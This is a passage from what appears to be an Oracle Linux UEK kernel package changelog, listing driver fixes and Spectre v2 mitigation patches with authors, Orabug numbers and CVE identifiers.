Fix indentation in iscsi_target_start_negotiation() (Bart Van Assche) [Orabug: 27701211] \n- iscsi-target: Fix early sk_data_ready LOGIN_FLAGS_READY race (Nicholas Bellinger) [Orabug: 27701211] \n- iscsi-target: Fix rx_login_comp hang after login failure (Nicholas Bellinger) [Orabug: 27701211] \n- KVM: x86: fix singlestepping over syscall (Paolo Bonzini) [Orabug: 27669904] {CVE-2017-7518} {CVE-2017-7518}\n- nfs: system crashes after NFS4ERR_MOVED recovery (Bill.Baker@oracle.com) [Orabug: 27679350] \n- NFS: Clean up nfs4_set_client() (Anna Schumaker) [Orabug: 27679350] \n- NFS4: Avoid migration loops (Benjamin Coddington) [Orabug: 27679350] \n- mstflint: update Makefile and Kconfig (Qing Huang) [Orabug: 27707445] \n- target: add inquiry_product module param to override LIO default (Kyle Fortin) [Orabug: 27679431] \n- target: add inquiry_vendor module param to override LIO-ORG (Kyle Fortin) [Orabug: 27679431] \n- IB/core: Avoid calling ib_query_device (Or Gerlitz) [Orabug: 27687711] \n- IB/core: Save the device attributes on the device structure (Ira Weiny) [Orabug: 27687711]\n[4.1.12-124.8.1]\n- nvme: fix uninitialized prp2 value on small transfers (Jan H. Schonherr) [Orabug: 27624149] \n- bnxt_en: initialize bnxt_pf_wq (Brian Maly) [Orabug: 27674029] \n- x86/spectre_v2: Fix cpu offlining with IPBP. (Konrad Rzeszutek Wilk)\n[4.1.12-124.7.1]\n- retpoline: selectively disable IBRS in disable_ibrs_and_friends() (Chuck Anderson) [Orabug: 27665263]\n[4.1.12-124.6.1]\n- bnxt_en: Add cache line size setting to optimize performance. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Forward VF MAC address to the PF. (Vasundhara Volam) [Orabug: 27648355] \n- bnxt_en: Add BCM5745X NPAR device IDs (Vasundhara Volam) [Orabug: 27648355] \n- bnxt_en: Expand bnxt_check_rings() to check all resources. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Implement new method for the PF to assign SRIOV resources. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Reserve resources for RFS. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Implement new method to reserve rings. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Set initial default RX and TX ring numbers the same in combined mode. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Add the new firmware API to query hardware resources. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Refactor hardware resource data structures. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Restore MSIX after disabling SRIOV. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Refactor bnxt_close_nic(). (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Update firmware interface to 1.9.0. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Fix the 'Invalid VF' id check in bnxt_vf_ndo_prep routine. (Venkat Duvvuru) [Orabug: 27648355] \n- bnxt_en: Fix sources of spurious netpoll warnings (Calvin Owens) [Orabug: 27648355] \n- bnxt_en: Dont print 'Link speed -1 no longer supported' messages. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Fix a variable scoping in bnxt_hwrm_do_send_msg() (Vasundhara Volam) [Orabug: 27648355] \n- bnxt_en: Need to unconditionally shut down RoCE in bnxt_shutdown (Ray Jui) [Orabug: 27648355] \n- bnxt_en: Fix an error handling path in 'bnxt_get_module_eeprom()' (Christophe JAILLET) [Orabug: 27648355] \n- bnxt: fix bnxt_hwrm_fw_set_time for y2038 (Arnd Bergmann) [Orabug: 27648355] \n- bnxt_en: Fix IRQ coalescing regression. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: fix typo in bnxt_set_coalesce (Andy Gospodarek) [Orabug: 27648355] \n- bnxt_en: Refactor and simplify coalescing code. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Reorganize the coalescing parameters. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Add ethtool reset method (Vasundhara Volam) [Orabug: 27648355] \n- bnxt_en: Optimize .ndo_set_mac_address() for VFs. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Get firmware package version one time. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Check for zero length value in bnxt_get_nvram_item(). (Michael Chan) [Orabug: 27648355] \n- bnxt_en: adding PCI ID for SMARTNIC VF support (Rob Miller) [Orabug: 27648355] \n- bnxt_en: Add PCIe device ID for bcm58804 (Ray Jui) [Orabug: 27648355] \n- bnxt_en: Update firmware interface to 1.8.3.1 (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Fix possible corruption in DCB parameters from firmware. (Sankar Patchineelam) [Orabug: 27648355] \n- bnxt_en: Fix VF resource checking. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Fix VF PCIe link speed and width logic. (Vasundhara Volam) [Orabug: 27648355] \n- bnxt_en: Dont use rtnl lock to protect link change logic in workqueue. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Improve VF/PF link change logic. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Remove redundant unlikely() (Tobias Klauser) [Orabug: 27648355] \n- drivers: net: bnxt: use setup_timer() helper. (Allen Pais) [Orabug: 27648355] \n- bnxt_en: Reduce default rings on multi-port cards. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Improve -ENOMEM logic in NAPI poll loop. (Michael Chan) [Orabug: 27648355] \n- bnxt: initialize board_info values with proper enums (Scott Branden) [Orabug: 27648355] \n- bnxt: Add PCIe device IDs for bcm58802/bcm58808 (Ray Jui) [Orabug: 27648355] \n- bnxt_en: assign CPU affinity hints to bnxt_en IRQs (Vasundhara Volam) [Orabug: 27648355] \n- bnxt_en: Improve tx ring reservation logic. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Update firmware interface spec. to 1.8.1.4. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Do not setup MAC address in bnxt_hwrm_func_qcaps(). (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Free MSIX vectors when unregistering the device from bnxt_re. (Michael Chan) [Orabug: 27648355] \n- bnxt_en: Fix .ndo_setup_tc() to include XDP rings. (Michael Chan) [Orabug: 27648355] \n- bnxt: fix unused variable warnings (stephen hemminger) [Orabug: 27648355] \n- bnxt: fix unsigned comparsion with 0 (stephen hemminger) [Orabug: 27648355] \n- bnxt_en: Use SWITCHDEV_SET_OPS(). (David S. Miller) [Orabug: 27648355] \n- bnxt_en: Set ETS min_bw parameter for older firmware. (Michael Chan) [Orabug: 27648355] \n- dccp/tcp: fix routing redirect race (Jon Maxwell) [Orabug: 27661864] \n- Revert 'RDS: dont commit to queue till transport connection is up' (Santosh Shilimkar) [Orabug: 27606911] \n- be2net: locking/atomics: COCCINELLE/treewide: Convert trivial ACCESS_ONCE() patterns to READ_ONCE()/WRITE_ONCE() (Mark Rutland) [Orabug: 27615319] \n- be2net: Handle transmit completion errors in Lancer (Suresh Reddy) [Orabug: 27615319] \n- be2net: Fix HW stall issue in Lancer (Suresh Reddy) [Orabug: 27615319] \n- be2net: remove redundant initialization of 'head' and pointer txq (Colin Ian King) [Orabug: 27615319] \n- be2net: networking block comments dont use an empty /* line (Rohit Visavalia) [Orabug: 27615319] \n- be2net: restore properly promisc mode after queues reconfiguration (Ivan Vecera) [Orabug: 27615319] \n- be2net: use ARRAY_SIZE for array sizing calculation on array cmd_priv_map (Colin Ian King) [Orabug: 27615319] \n- RDS: IB: Fix null pointer issue (Guanglei Li) [Orabug: 27636711] \n- xen/acpi: upload _PSD info for non-dom0 CPUs too (Joao Martins) [Orabug: 27655759] \n- scsi: lpfc: Update 11.4.0.7 modified files for 2018 Copyright (James Smart) [Orabug: 27631736] \n- scsi: lpfc: update driver version to 11.4.0.7 (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Treat SCSI Write operation Underruns as an error (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Fix SCSI io host reset causing kernel crash (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Fix issue_lip if link is disabled (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Fix soft lockup in lpfc worker thread during LIP testing (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Allow set of maximum outstanding SCSI cmd limit for a target (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Fix PRLI handling when topology type changes (James Smart) [Orabug: 27631736] \n- scsi: lpfc: fix a couple of minor indentation issues (Colin Ian King) [Orabug: 27631736] \n- scsi: lpfc: update driver version to 11.4.0.6 (James Smart) [Orabug: 27631736] \n- scsi: lpfc: update driver version to 11.4.0.5 (James Smart) [Orabug: 27631736] \n- scsi: lpfc: FLOGI failures are reported when connected to a private loop. (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Fix ndlp ref count for pt2pt mode issue RSCN (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Linux LPFC driver does not process all RSCNs (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Driver fails to detect direct attach storage array (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Fix crash after bad bar setup on driver attachment (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Fix hard lock up NMI in els timeout handling. (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: change version to 11.4.0.4 (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: Extend RDP support (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: Fix secure firmware updates (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: PLOGI failures during NPIV testing (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: Fix crash receiving ELS while detaching driver (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: fix pci hot plug crash in list_add call (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: fix pci hot plug crash in timer management routines (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: remove redundant null check on eqe (Colin Ian King) [Orabug: 27631736] \n- scsi: lpfc: lpfc version bump 11.4.0.3 (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: fix 'integer constant too large' error on 32bit archs (Maurizio Lombardi) [Orabug: 27631736] \n- scsi: lpfc: Add Buffer to Buffer credit recovery support (James Smart) [Orabug: 27631736] \n- scsi: lpfc: Correct issues with FAWWN and FDISCs (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: Fix rediscovery on switch blade pull (Dick Kennedy) [Orabug: 27631736] \n- scsi: lpfc: remove useless code in lpfc_sli4_bsg_link_diag_test (Gustavo A. R. Silva) [Orabug: 27631736] \n- scsi: lpfc: Fix plogi collision that causes illegal state transition (Dick Kennedy) [Orabug: 27631736] \n- lpfc: Fix Express lane queue creation (Maurizio Lombardi) [Orabug: 27631736] \n- Cosmetic updates to arch/x86/kernel/cpu/microcode/xen.c to pass checkpatch.pl and match UEK5 code. (Aaron Young) [Orabug: 27640697] \n- Incorporate arch/x86/kernel/cpu/microcode/xen.c into cpu microcode driver. (Aaron Young) [Orabug: 27640697] \n- 1. Move arch/x86/kernel/microcode_xen.c file to proper cpu microcode driver location and rename to arch/x86/kernel/cpu/microcode/xen.c. (Aaron Young) [Orabug: 27640697] \n- fork: fix incorrect fput of ->exe_file causing use-after-free (Eric Biggers) [Orabug: 27648200] {CVE-2017-17052}\n- scsi: megaraid_sas: Do not use 32-bit atomic request descriptor for Ventura controllers (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: NVMe passthrough command support (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid: use ktime_get_real for firmware time (Arnd Bergmann) [Orabug: 27625001] \n- scsi: megaraid_sas: driver version upgrade (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: re-work DCMD refire code (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Expose fw_cmds_outstanding through sysfs (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Selectively apply stream detection based on IO type (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Update LD map after populating drv_map driver map copy (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Use megasas_wait_for_adapter_operational to detect controller state in IOCTL path (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Avoid firing DCMDs while OCR is in progress (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: unload flag should be set after scsi_remove_host is called (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Error handling for invalid ldcount provided by firmware in RAID map (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Reset ldio_outstanding in megasas_resume (Sumit Saxena) [Orabug: 27625001] \n- scsi: megaraid_sas: Return the DCMD status from megasas_get_seq_num (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: memset IOC INIT frame using correct size (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: zero out IOC INIT and stream detection memory (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: fix spelling mistake: 'thershold' -> 'threshold' (Colin Ian King) [Orabug: 27625001] \n- scsi: megaraid: Remove redundant code in megasas_alloc_cmds (Yisheng Xie) [Orabug: 27625001] \n- License cleanup: add SPDX GPL-2.0 license identifier to files with no license (Greg Kroah-Hartman) [Orabug: 27625001] \n- scsi: megaraid_sas: driver version upgrade (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Add support for 64bit consistent DMA (Sumit Saxena) [Orabug: 27625001] \n- scsi: megaraid_sas: Do not limit queue_depth to 1k in non-RDPQ mode (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Retry with reduced queue depth when alloc fails for higher QD (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Incorrect processing of IOCTL frames for SMP/STP commands (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Resize MFA frame used for IOC INIT to 4k (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Update current host time to FW during IOC Init (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Move controller memory allocations and DMA mask settings from probe to megasas_init_fw (Sumit Saxena) [Orabug: 27625001] \n- scsi: megaraid_sas: Move initialization of instance parameters inside newly created function megasas_init_ctrl_params (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: remove instance->ctrl_info (Sumit Saxena) [Orabug: 27625001] \n- scsi: megaraid_sas: Pre-allocate frequently used DMA buffers (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Create separate functions for allocating and freeing controller DMA buffers (Sumit Saxena) [Orabug: 27625001] \n- scsi: megaraid_sas: Create separate functions to allocate ctrl memory (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: reduce size of fusion_context and use kmalloc for allocation (Sumit Saxena) [Orabug: 27625001] \n- scsi: megaraid_sas: replace is_ventura with adapter_type checks (Sumit Saxena) [Orabug: 27625001] \n- scsi: megaraid_sas: Remove redundant checks for ctrl_context (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: replace instance->ctrl_context checks with instance->adapter_type (Sumit Saxena) [Orabug: 27625001] \n- scsi: megaraid_sas: Add support for Crusader controllers (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: use adapter_type for all gen controllers (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: driver version upgrade (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: call megasas_dump_frame with correct IO frame size (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: modified few prints in OCR and IOC INIT path (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: replace internal FALSE/TRUE definitions with false/true (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Return pended IOCTLs with cmd_status MFI_STAT_WRONG_STATE in case adapter is dead (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: use vmalloc for crash dump buffers and drivers local RAID map (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Use SMID for Task abort case only (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Check valid aen class range to avoid kernel panic (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Fix endianness issues in DCMD handling (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Do not re-fire shutdown DCMD after OCR (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Call megasas_complete_cmd_dpc_fusion every 1 second while there are pending commands (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: Use synchronize_irq in target reset case (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: set minimum value of resetwaittime to be 1 secs (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: mismatch of allocated MFI frame size and length exposed in MFI MPT pass through command (Shivasharan S) [Orabug: 27625001] \n- scsi: megaraid_sas: fix error handle in megasas_probe_one (weiping zhang) [Orabug: 27625001] \n- scsi: megaraid_sas: fix allocate instance->pd_info twice (weiping) [Orabug: 27625001] \n- scsi: remove DRIVER_ATTR() usage (Greg Kroah-Hartman) [Orabug: 27625001] \n- scsi: megaraid: Replace PCI pool old API (Romain Perier) [Orabug: 27625001] \n- scsi: megaraid_sas: fix memleak in megasas_alloc_cmdlist_fusion (Shu Wang) [Orabug: 27625001] \n- scsi: megaraid: Fix a sleep-in-atomic bug (Jia-Ju Bai) [Orabug: 27625001] \n- drivers/scsi/megaraid: remove expensive inline from megasas_return_cmd (Andi Kleen) [Orabug: 27625001] \n- megaraid_sas: remove redundant code initialzing *pDevHandle with MR_DEVHANDLE_INVALID (Sumit Saxena) [Orabug: 27625001] \n- usb: usbtest: fix NULL pointer dereference (Alan Stern) [Orabug: 27602322] {CVE-2017-16532}\n- rds: Incorrect reference counting in TCP socket creation (Ka-Cheong Poon) [Orabug: 27602824] \n- enic: enable rq before updating rq descriptors (Govindarajulu Varadarajan) [Orabug: 27587345] \n- enic: add sw timestamp support (Govindarajulu Varadarajan) [Orabug: 27587345] \n- enic: add wq clean up budget (Govindarajulu Varadarajan) [Orabug: 27587345] \n- enic: Add support for 'ethtool -g/-G' (Parvi Kaustubhi) [Orabug: 27587345] \n- enic: reset fetch index (Parvi Kaustubhi) [Orabug: 27587345] \n- drivers: net: enic: use setup_timer() helper. (Allen Pais) [Orabug: 27587345] \n- drivers: net: enic: use setup_timer() helper. (Allen Pais) [Orabug: 27587345] \n- enic: update enic maintainers (Govindarajulu Varadarajan) [Orabug: 27587345] \n- cisco: enic: Fic an error handling path in 'vnic_dev_init_devcmd2()' (Christophe Jaillet) [Orabug: 27587345] \n- enic: Fix format truncation warning (Govindarajulu Varadarajan) [Orabug: 27587345] \n- enic: add devcmds for vxlan offload (Govindarajulu Varadarajan) [Orabug: 27587345] \n- enic: increment devcmd2 result ring in case of timeout (Sandeep Pillai) [Orabug: 27587345] \n- scsi: fnic: use kzalloc in fnic_fcoe_process_vlan_resp (Rasmus Villemoes) [Orabug: 27587343] \n- scsi: fnic: add a space after %p in printf format (Nicolas Iooss) [Orabug: 27587343] \n- scsi: fnic: Fix coccinelle warnings (Vasyl Gomonovych) [Orabug: 27587343] \n- scsi: fnic: do not call host reset from command abort (Hannes Reinecke) [Orabug: 27587343] \n- scsi: fnic: fix format string overflow warning (Arnd Bergmann) [Orabug: 27587343] \n- scsi: fnic: correct speed display and add support for 25,40 and 100G (Satish Kharat) [Orabug: 27587343] \n- scsi: fnic: added timestamp reporting in fnic debug stats (Satish Kharat) [Orabug: 27587343] \n- scsi: fnic: Zero io_cmpl_skip on fw reset completion (Satish Kharat) [Orabug: 27587343] \n- scsi: fnic: Ratelimit printks to avoid flooding when vlan is not set by the switch.i (Satish Kharat) [Orabug: 27587343] \n- scsi: fnic: use kernels '%pM' format option to print MAC (Andy Shevchenko) [Orabug: 27587343] \n- fnic: pci_dma_mapping_error() doesnt return an error code (Dan Carpenter) [Orabug: 27587343] \n- fnic: move printk()s outside of the critical code section. (Maurizio Lombardi) [Orabug: 27587343] \n- fnic: check pci_map_single() return value (Maurizio Lombardi) [Orabug: 27587343] \n- retpoline: move setting of sysctl_ibrs_enabled and sysctl_ibpb_enabled to where SPEC_CTRL_IBRS_INUSE and SPEC_CTRL_IBPB_INUSE are set (Chuck Anderson) [Orabug: 27625404] \n- retpoline: set IBRS and IBPB in use only on the boot CPU call to init_scattered_cpuid_features() (Chuck Anderson) [Orabug: 27625404] \n- retpoline: display IBPB feature status along with IBRS status (Chuck Anderson) [Orabug: 27625404] \n- retpoline: move lock/unlock of spec_ctrl_mutex to check_modinfo() (Chuck Anderson) [Orabug: 27625404] \n- retpoline: call clear_retpoline_fallback() with boot parm spectre_v2_heuristics=off (Chuck Anderson) [Orabug: 27625404] \n- retpoline: add brackets to check_ibrs_inuse() and clear_ibpb_inuse() (Chuck Anderson) [Orabug: 27625404] \n- retpoline/module: do not enable IBRS/IPBP if SPEC_CTRL_IBRS_ADMIN_DISABLED/SPEC_CTRL_IBPB_ADMIN_DISABLED is set (Chuck Anderson) [Orabug: 27625353] \n- retpoline: microcode incorrectly reported as broken during early boot (Chuck Anderson) [Orabug: 27625404] \n- retpoline: move lock/unlock of spec_ctrl_mutex into init_scattered_cpuid_features() (Chuck Anderson) [Orabug: 27625404] \n- retpoline/module: fall back to another spectre mitigation when disabling retpoline (Chuck Anderson) [Orabug: 27457549] \n- retpoline/module: add bit defs for use_ibpb (Chuck Anderson) [Orabug: 27457549] \n- x86/spectre_v2: Fix the documentation to say the right thing. (Konrad Rzeszutek Wilk) \n- x86/spectre_v2: Dont check bad microcode versions when running under hypervisors. (Konrad Rzeszutek Wilk) [Orabug: 27601736] \n- x86/speculation: Use IBRS if available before calling into firmware (David Woodhouse) [Orabug: 27516477] \n- Revert 'x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation' (Konrad Rzeszutek Wilk) [Orabug: 27601789] \n- Revert 'x86/spec: Add 'lfence_enabled' in sysfs' (Konrad Rzeszutek Wilk) \n- KVM: Disable irq while unregistering user notifier (Ignacio Alvarado) \n- dtrace: increase instruction limit for FBT entry probe detection (Kris Van Hees) [Orabug: 27410742]\n[4.1.12-124.5.1]\n- trace: declare blk_add_trace_rq non-static on OL6 (Todd Vierling) [Orabug: 27578618] \n- x86/ia32/syscall: RESTORE_EXTRA_REGS when returning from syscall (Ankur Arora) [Orabug: 27461990] {CVE-2017-5715}\n- x86/ia32/syscall: dont do RESTORE_EXTRA_REGS prematurely (Ankur Arora) [Orabug: 27461990] {CVE-2017-5715}\n- firmware: dmi_scan: add SBMIOS entry and DMI tables (Ivan Khoronzhuk) [Orabug: 27586223] \n- uek-rpm: enable USERFAULTFD in debug kernels (UEK4 QU7) (Mike Kravetz) [Orabug: 27579702] \n- vmxnet3: repair memory leak (Neil Horman) [Orabug: 27479086] \n- bonding: attempt to better support longer hw addresses (Jarod Wilson) [Orabug: 27542370] \n- scsi: Make __scsi_remove_device go straight from BLOCKED to DEL (Bart Van Assche) [Orabug: 27546768] \n- scsi: Protect SCSI device state changes with a mutex (Bart Van Assche) [Orabug: 27546768] \n- scsi: Introduce scsi_start_queue() (Bart Van Assche) [Orabug: 27546768] \n- scsi: avoid a permanent stop of the scsi devices request queue (Wei Fang) [Orabug: 27546768] \n- IB/ipoib: ioctls IPOIBACLNADD and IPOIBACLNGET do not work correctly (Ka-Cheong Poon) [Orabug: 27533123] \n- x86/spectre: move microcode check before kernel ibrs flags are set (Daniel Jordan) [Orabug: 27542331] {CVE-2017-5715}\n[4.1.12-124.4.1]\n- x86: make HAVE_FENTRY dependent on !SIMULATE_GCC44_KABI (Todd Vierling) [Orabug: 27540463] \n- x86/spectre_v2: Only use IBRS when ibrs_inuse tells us to (Konrad Rzeszutek Wilk) \n- kernel: on OL6 only, simulate the gcc 4.4 kABI for __stack_chk_fail() (Todd Vierling) [Orabug: 27509351] \n- uek-rpm: configs: Dont set HAVE_FENTRY on OL6 builds. (Todd Vierling) [Orabug: 27509351] \n- KVM/VMX: Allow direct access to MSR_IA32_SPEC_CTRL (KarimAllah Ahmed) [Orabug: 27525575] \n- x86/spectre_v2: Disable IBRS if spectre_v2=off (Konrad Rzeszutek Wilk) \n- xenbus: track caller request id (Joao Martins) [Orabug: 27472576] \n- x86/spectre_v2: Remove 0xc2 from spectre_bad_microcodes (Darren Kenny) [Orabug: 27523393] \n- x86/speculation: Use Indirect Branch Prediction Barrier in context switch (Tim Chen) [Orabug: 27524608] \n- Fix typo IBRS_ATT, which should be IBRS_ALL (redux) (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre_v2: Add spectre_v2_heuristics= (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre_v2: Do not disable IBPB when disabling IBRS (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/scattered: Fix the order. (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre: Favor IBRS on Skylake over retpoline (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/speculation: Fix typo IBRS_ATT, which should be IBRS_ALL (Darren Kenny) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre: Now that we expose 'stbibp' make sure it is correct. (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/cpufeatures: Clean up Spectre v2 related CPUID flags (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/speculation: Add basic IBPB (Indirect Branch Prediction Barrier) support (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/bugs: Drop one 'mitigation' from dmesg (Borislav Petkov) [Orabug: 27477743] {CVE-2017-5715}\n- x86/nospec: Fix header guards names (Borislav Petkov) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre_v2: Dont spam the console with these: (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/cpufeature: Blacklist SPEC_CTRL/PRED_CMD on early Spectre v2 microcodes (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/cpu: Keep model defines sorted by model number (Andy Shevchenko) [Orabug: 27477743] {CVE-2017-5715}\n- x86/pti: Do not enable PTI on CPUs which are not vulnerable to Meltdown (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/msr: Add definitions for new speculation control MSRs (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/cpufeatures: Add AMD feature bits for Speculation Control (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre_v2: Print what options are available. (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre_v2: Add VMEXIT_FILL_RSB instead of RETPOLINE (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre: If IBRS is enabled disable 'Filling RSB on context switch' (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- KVM: VMX: Allow direct access to MSR_IA32_SPEC_CTRL (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre_v2: Dont allow {ibrs,ipbp,lfence}_enabled to be toggled if retpoline (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre: Fix retpoline_enabled (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre: Update sysctl values if toggled only by set_{ibrs,ibpb}_disabled (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- retpoline/module: Taint kernel for missing retpoline in module (Andi Kleen) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline: Fill RSB on context switch for affected CPUs (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline: Optimize inline assembler for vmexit_fill_RSB (Andi Kleen) [Orabug: 27477743] {CVE-2017-5715}\n- kprobes/x86: Disable optimizing on the function jumps to indirect thunk (Masami Hiramatsu) [Orabug: 27477743] {CVE-2017-5715}\n- kprobes/x86: Blacklist indirect thunk functions for kprobes (Masami Hiramatsu) [Orabug: 27477743] {CVE-2017-5715}\n- retpoline: Introduce start/end markers of indirect thunk (Masami Hiramatsu) [Orabug: 27477743] {CVE-2017-5715}\n- x86/mce: Make machine check speculation protected (Thomas Gleixner) [Orabug: 27477743] {CVE-2017-5715}\n- kbuild: modversions for EXPORT_SYMBOL() for asm (Nicholas Piggin) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline: Add LFENCE to the retpoline/RSB filling RSB macros (Tom Lendacky) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline: Remove compile time warning (Thomas Gleixner) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline: Fill return stack buffer on vmexit (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline/irq32: Convert assembler indirect jumps (Andi Kleen) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline/checksum32: Convert assembler indirect jumps (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline/xen: Convert Xen hypercall indirect jumps (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline/hyperv: Convert assembler indirect jumps (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline/ftrace: Convert ftrace assembler indirect jumps (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline/entry: Convert entry assembler indirect jumps (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline/crypto: Convert crypto assembler indirect jumps (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre_v2: Add disable_ibrs_and_friends (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- 